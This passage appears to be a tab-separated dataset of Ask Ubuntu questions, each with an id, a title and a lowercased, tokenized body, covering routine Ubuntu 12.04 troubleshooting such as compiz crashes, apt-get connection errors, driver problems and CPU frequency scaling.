181377	compiz / unity very unstable , crashing very often on 12.04	i 'm using acer timelinex from beginning of using 12.04 , compiz is crashing more than twice daily . up to today i 've been trying to solve this problem by : using another driver and graphic card . using newest kernel and xorg from quantal backports . resetting compiz settings and whole profile . changing alt+tab button bindings ( i 've readed that can be related ) . what can i do more to resolve this issue ?
181379	how to increment a value appended to another value in a shell script	i have a shell script that executes a backup program and saves the output in a folder . i would like to update the name of the output folder every time the shell script run . in the end i want to have many files with different names like this : innobackupex -- user=root -- password= @ g @ 1n -- database= '' open_cart '' /var/backup/backup_1 -- no-timestamp and after running the shell script again : innobackupex -- user=root -- password= @ g @ 1n -- database= '' open_cart '' /var/backup/backup_2 -- no-timestamp
181381	what package creates /usr/lib/jvm/default-java ?	i 'm trying to setup jenkins on 11.10 using only ubuntu-provided packages . after apt-get install jenkins , jenkins wo n't start . i traced it to an absent /usr/lib/jvm/default-java/bin/java . desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===============================-=======================================-============================================================================== ii jenkins 1.409.1-0ubuntu4.2 continuous integration and job scheduling server ii openjdk-6-jre 6b24-1.11.3-1ubuntu0.11.10.1 openjdk java runtime , using hotspot jit # update-alternative -- config java there is only one alternative in link group java : /usr/lib/jvm/java-6-openjdk/jre/bin/java nothing to configure . what package creates /usr/lib/jvm/default-java ?
181384	can i download ubuntu for android to my mobile device ?	my question is already in the title . i want to buy a tablet but i want to work with openoffice as well . so in combination with a monitor and a dock it would be possible . but can i download ubuntu for android somewhere ?
181386	how to remove unwanted items from gnome `` other menu ''	i opened other menu and found that it contains a lot of items ( see image ) is there a way to clean-it up ? do n't want to edit menu manually ...
181387	vga monitor wo n't detect on nvidia quadro nvs 4200m	i am on a dell latitude e6420 and just installed 12.04 . when i plug in my external monitor 's vga cable , the laptop does n't detect any new monitor . here 's the output of my lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 6 series/c200 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ quadro nvs 4200m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation hdmi audio stub ( rev a1 ) 03:00.0 network controller : intel corporation centrino advanced-n 6205 ( rev 34 ) 0b:00.0 sd host controller : o2 micro , inc. device 8221 ( rev 05 ) 0b:00.1 mass storage controller : o2 micro , inc. device 8231 ( rev 03 ) i tried installing the quadro nvs 4200m from the nvidia website but got stuck in tty after the installation finished . any ideas as to how i can get the external monitor to work ? thanks !
181390	what is the command for sleep/hibernate ?	i have an acre aspire one and this netbook does not have a sleep function on the key board and with the removal of the hibernate option i have been required to resort to shutting my comp down every time . so i know that under 'system settings ' > 'keyboard ' > 'shortcuts ' i can create a custom key combo but i do not know that the command is of the sleep setting . so , please help . thank you
181392	multiple computers on ubuntu one	i have added files from 4 computers to ubuntu one . one computer failed . what happens to the files that i uploaded ? are they still on ubuntu one ? how come when i upload a file from computer a , computer b with the same ubuntu one account does not sync and load that file into computer b - that has created this question . what happens to files from computers from which i uploaded documents when those computers are no longer active or failed , or no longer have ubuntu one on that computer from which the files were uploaded ? have i lost the files ? the follow-up question is how come files from computer a uploaded to ubuntu one do n't sync to computer b ? that is a related question . i need to shutdown a computer , reformat the hard drive and install linux on the entire hard drive instead of a dual boot with windows xp , as i am going to use virtual machines instead . what happens to the files from the windows dual boot that were uploaded to ubuntu one ? are they removed from ubuntu one and then have i lost those files if i do n't backup to another service first .
181401	`` unable to connect '' error with apt-get : possible proxy ?	i 've been having an issue with 'sudo apt-get update ' for several days now . i 've tried every proposed solution i could find but to no avail . here is the output to 'apt-get update ' . ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease ign http : //us.archive.ubuntu.com precise-security inrelease ign http : //archive.ubuntu.com precise inrelease err http : //us.archive.ubuntu.com precise release.gpg unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates release.gpg unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports release.gpg unable to connect to 69.163.233.85:80 : err http : //archive.ubuntu.com precise release.gpg unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security release.gpg unable to connect to 69.163.233.85:80 : ign http : //us.archive.ubuntu.com precise release ign http : //us.archive.ubuntu.com precise-updates release ign http : //archive.ubuntu.com precise release ign http : //us.archive.ubuntu.com precise-backports release ign http : //us.archive.ubuntu.com precise-security release ign http : //us.archive.ubuntu.com precise/main translationindex ign http : //us.archive.ubuntu.com precise/multiverse translationindex ign http : //us.archive.ubuntu.com precise/restricted translationindex ign http : //us.archive.ubuntu.com precise/universe translationindex ign http : //archive.ubuntu.com precise/main translationindex ign http : //us.archive.ubuntu.com precise-updates/main translationindex ign http : //us.archive.ubuntu.com precise-updates/multiverse translationindex ign http : //us.archive.ubuntu.com precise-updates/restricted translationindex ign http : //us.archive.ubuntu.com precise-updates/universe translationindex ign http : //us.archive.ubuntu.com precise-backports/main translationindex ign http : //us.archive.ubuntu.com precise-backports/multiverse translationindex ign http : //us.archive.ubuntu.com precise-backports/restricted translationindex ign http : //us.archive.ubuntu.com precise-backports/universe translationindex ign http : //us.archive.ubuntu.com precise-security/main translationindex ign http : //us.archive.ubuntu.com precise-security/multiverse translationindex ign http : //us.archive.ubuntu.com precise-security/restricted translationindex ign http : //us.archive.ubuntu.com precise-security/universe translationindex err http : //archive.ubuntu.com precise/main sources unable to connect to 69.163.233.85:80 : err http : //archive.ubuntu.com precise/main i386 packages unable to connect to 69.163.233.85:80 : err http : //archive.ubuntu.com precise/main translation-en_us unable to connect to 69.163.233.85:80 : err http : //archive.ubuntu.com precise/main translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/main sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/restricted sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/universe sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/multiverse sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/main i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/restricted i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/universe i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/multiverse i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/main sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/restricted sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/universe sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/multiverse sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/main i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/restricted i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/universe i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/main sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/restricted sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/universe sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/multiverse sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/main i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/restricted i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/universe i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/main sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/restricted sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/universe sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/multiverse sources unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/main i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/restricted i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/universe i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/multiverse i386 packages unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/main translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/main translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/multiverse translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/multiverse translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/restricted translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/restricted translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/universe translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise/universe translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/main translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/main translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/multiverse translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/multiverse translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/restricted translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/restricted translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/universe translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-updates/universe translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/main translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/main translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/multiverse translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/multiverse translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/restricted translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/restricted translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/universe translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-backports/universe translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/main translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/main translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/multiverse translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/multiverse translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/restricted translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/restricted translation-en unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/universe translation-en_us unable to connect to 69.163.233.85:80 : err http : //us.archive.ubuntu.com precise-security/universe translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/release.gpg unable to connect to 69.163.233.85:80 : w : failed to fetch http : //archive.ubuntu.com/dists/precise/release.gpg unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //archive.ubuntu.com/dists/precise/main/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //archive.ubuntu.com/dists/precise/main/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //archive.ubuntu.com/dists/precise/main/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //archive.ubuntu.com/dists/precise/main/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/main/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/main/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/restricted/i18n/translation-en unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en_us unable to connect to 69.163.233.85:80 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-security/universe/i18n/translation-en unable to connect to 69.163.233.85:80 : e : some index files failed to download . they have been ignored , or old ones used instead .
181404	app for taking a screenshot , editing and uploading it to a server	do you know of any app that can take a screenshot using a keyboard shortcut , open a window for selecting a region of the screenshot and upload it to a hosting like imgur ? preferably for kde .
181405	how do i install ubuntu server on a rackable server using usb ?	can i get set by step instructions on how to do this ? everyone has different instructions on how to do this . this rackable server has no os installed and i want to put ubuntu server on it . it has 4 usb ports on it . how can i do this in dummy edition please ?
181409	what ppas support the arm architecture ( armel ) ?	i 'm running ubuntu arm 11.10 on my asus eee pad tablet . i would like to have access to all my options . what ppas support armel right now ? or what third party repos work with ubuntu arm ? i usually like to add webupd8 etc ... for x86
181412	cuda driver , cpu/gpu performances issue	i implemented a rns montgomery exponentiation in cuda and on cpu for comparison . everything nice everything fine . it runs on just one sm . however , i am going to tell you some strange regression in both cpu/gpu performances . during the developing , about two months ago , i was using cuda 5 preview on ubuntu 11.04 64bit . in this time , i reach the following performances : cpu 460ms gpu 120ms then one day , when i turn on the pc , the graphical environment did n't start . i do n't know which was the problem , however i switched to the console and installed again the cuda driver . at the following boot performances changed : cpu 310ms gpu 80ms i was wondering how that could be possible . however , i went then in holiday for 10 days and i continued developing and optimizing on my notebook ( but not the same part of the code , some additional stuff ) . when i was back , i just updated the source files , and performances came back to 460/120ms . i could n't believe it , i tried to install cuda 5 rc , updating the video driver too . nothing changed . i checked debug/release , cuda computability , but the problem seems being somewhere else . looking around the net i found this , i am pretty sure it must have something to do with the driver , because the performance change affected both cpu and gpu do you have some tips/ideas/suggestions ?
181417	how do i control remote windows 7 machine ? vnc/rdp/ ?	i have a windows 7 laptop that 's going out and about and i 'd like to be able to admin ' it from my ubuntu ( precise ) desktop . while the laptop is in my office i can use gnome 's `` remote desktop viewer '' ( vinagre ) to connect via rdp . however , when it 's in the office i do n't really need rdp of course ! and when it 's out of the office i can not control the routers/firewalls along the way , so i wo n't know the ip and can not set up port forwards . i 'm looking for a ubuntu compatible way to achieve this . nb . i can set up port forwards at the my office end , so a service on the laptop could try a `` backwards '' connection to my client .
181419	how to reverse colors for the current window in gnome shell ?	i dislike that most websites use a black font on white background for their sites , as it gets too tiresome for me to read . back in the days of 11.04 , using gnome2 with compiz , there actually was a negative feature that could negate the content of any window , making the background black and the font white . much easier on the eyes for me . yet since 11.10 , using gnome shell with mutter , i have no idea if there is something alike out there . hence my question : how do i negate the currently active window in gnome shell ? i am not interested in alternative methods , e.g . user styles . i am aware of their existence but i find it much easier to just invert the screen by the hit of a key shortcut . i also want the solution to be application-agnostic . as i also from time to time would want to invert libre-office or some other glaringly white application .
181423	grub loads but only show the purple screen	when my laptop is booting i ca n't see the menu , but grub is there , if i press enter it boots my first option , it 's only showing the purple screen . i 'm pretty sure it 's some video setting , but i do n't know what to change . my configuration : ubuntu 12.04 lts laptop asus n56vz geforce gt 550m
181428	how to connect to `` alt.os.linux.ubuntu '' newsgroup	i want to access the alt.os.linux.ubuntu newsgroup and read the threads . i appreciate if someone could tell me how to add this newsgroup . i downloaded pan , but they are asking for server names for connecting . i am using ubuntu 12.04 .
181429	is a /proc mount necessary in /etc/fstab ?	this zfs guide claims : the ubuntu desktop installer may add dev , proc , sys , or tmp lines to the /etc/fstab file , but such entries are not strictly necessary for a modern system . add them now if you want them . how true is this ? my ubuntu 12.04 installation contains an explicit /proc mount . if it 's unnecessary , why does ubuntu include it ?
181430	opening up a cmyk psd file in gimp ( 2.8 )	i am running gimp 2.8 and tried to open up a cmyk psd file and got this error : opening 'homepage.psd ' failed : procedure 'file-psd-load ' returned no return values am i missing a plugin ? is there a way to do this ? my preference is not to use tools like imagemagick to convert the psd into many pngs but rather to open it directly in gimp .
181432	all the application are gone from the dash home	i am using an ubuntu 12.04 lts in an eeepc netbook . i 've been using this for more or less 3 months now . i keep on receiving a software update and install it without re-starting my netbook after the installation . then suddenly , starting two weeks ago , when i type an application in the dash home , it says , no result found . i tried every application that i remember i had installed and everything is gone , except for those applications that are locked in the launcher and only the files and folders remained . i also try to click the ubuntu software but it buffer..i am a newbie in this..please give me a detailed solution on how to fix this .
181433	how can i find out what drivers are built into my kernel ?	sensors-detect tells me : to load everything that is needed , add this to /etc/modules : # chip drivers coretemp w83627ehf if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! how can i find out which drivers are appropriate to skip , if any ?
181448	fvwm & fvwm-crystal installation on 12.04 ubuntu command-line-system	i 'm not sure if this question should be asked here , in this forum . if it is not , i 'm sorry and please refer me to any place where it 's appropriate to ask . my question is : `` how to install fvwm and fvwm-crystal on 12.04 ubuntu command-line-system ? '' if possible , i 'd love to have a step-by-step instruction . if these are too much to ask , then would it be possible for me to ask for the dependencies or packages to install before i can get to the fvwm desktop-environment ? thank you very much for your time and effort in reading this question ( and answer ) .
181453	how do i install freetts in 12.04 ?	i am working on speech recognition in java ; for which i require a third party library . as i need to import classes like javax.speech.recognition in my code . i downloaded the source code from this link : - freetts but was n't able to make any progress : ( , .
181455	broadcom bcm4331 not working on new mac mini 5,1	i ca n't seem to get my wireless card working on my mac mini 5,1 . lspci returns : 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) but running `` additional drivers '' does n't detect anything . the nm-applet menu reads `` device not ready -- firmware missing . '' what can i do to get this to work ? note , this is with 12.04.1 , so many of the previous discussions ( for 11.10 , etc ) probably do n't apply here .
181456	ubuntu 12.04 : minecraft 's fps is limited at 30 fps	recently , i decided to dual boot windows 7 with ubuntu . ubuntu 's great . it 's very fast and easy to use . the only problem i 'm having at the moment is running minecraft . see , minecraft runs at a smooth 60-70 fps , fast graphics + tiny render distance on windows , but on ubuntu , the fps is capped at 30 . the only mod i have installed at the moment is the optifine mod , which boots the performance of minecraft substantially . in the video options , i have the performance option set to `` max fps '' which is supposed to uncap the fps . i 'm really stumped here . here 's my system specs , because i 'm sure they 'll help : these specs are completely stock , by the way . model : asus essentio cm5571-br003 cpu : intel pentium dual core @ 2.70 ghz x2 gpu : intel g43/g45 express chipset ram : 6gb ddr3 any help would be greatly appreciated . thanks !
181459	normal ram usage for ubuntu 12.04 + unity ?	my system is ubuntu 12.04 64 bit + unity and it uses ~480mb with no other processes-apps open , just the core system . is this the expected amount ? it seems a bit steep to me but perhaps this is normal behavior .
181461	cpu frequency scaling methods *not* working lubuntu 12.04	i 've been trying to get cpu frequency scaling enabled on an old laptop ( celeron 530 ) running lubuntu 12.04 . i know this works in bios because it worked under vista , and i can just get it working for about 5 minutes , sometimes , from a cold boot . initially , the fresh install did not have any governors or cpu drivers loaded . however , i 've followed the advice from http : //www.pantz.org/software/cpufreq/usingcpufreqonlinux.html and got to the stage where governors are available , and cpu driver is loaded . after that , nothing seems to work . there is no directory for ondemand to edit files in . i 've also tried the method from the performance governor for cpufreq does n't seem to behave as advertised and edited the relative conf file so that the only possible available profile is `` on demand '' and it is selected for all . nothing . however , my issues seem to be a bit different . i ca n't get changes to the config files to stick , except for changes to /etc/cpufreqd.conf . either editing from the file manager , from the terminal as sudo , from the terminal as root , even if permissions and ownership of files has been changed . it also does n't stick if cpufreq-set -g ondemand is used . the machine is stuck under the performance governor regardless . any changes i make to 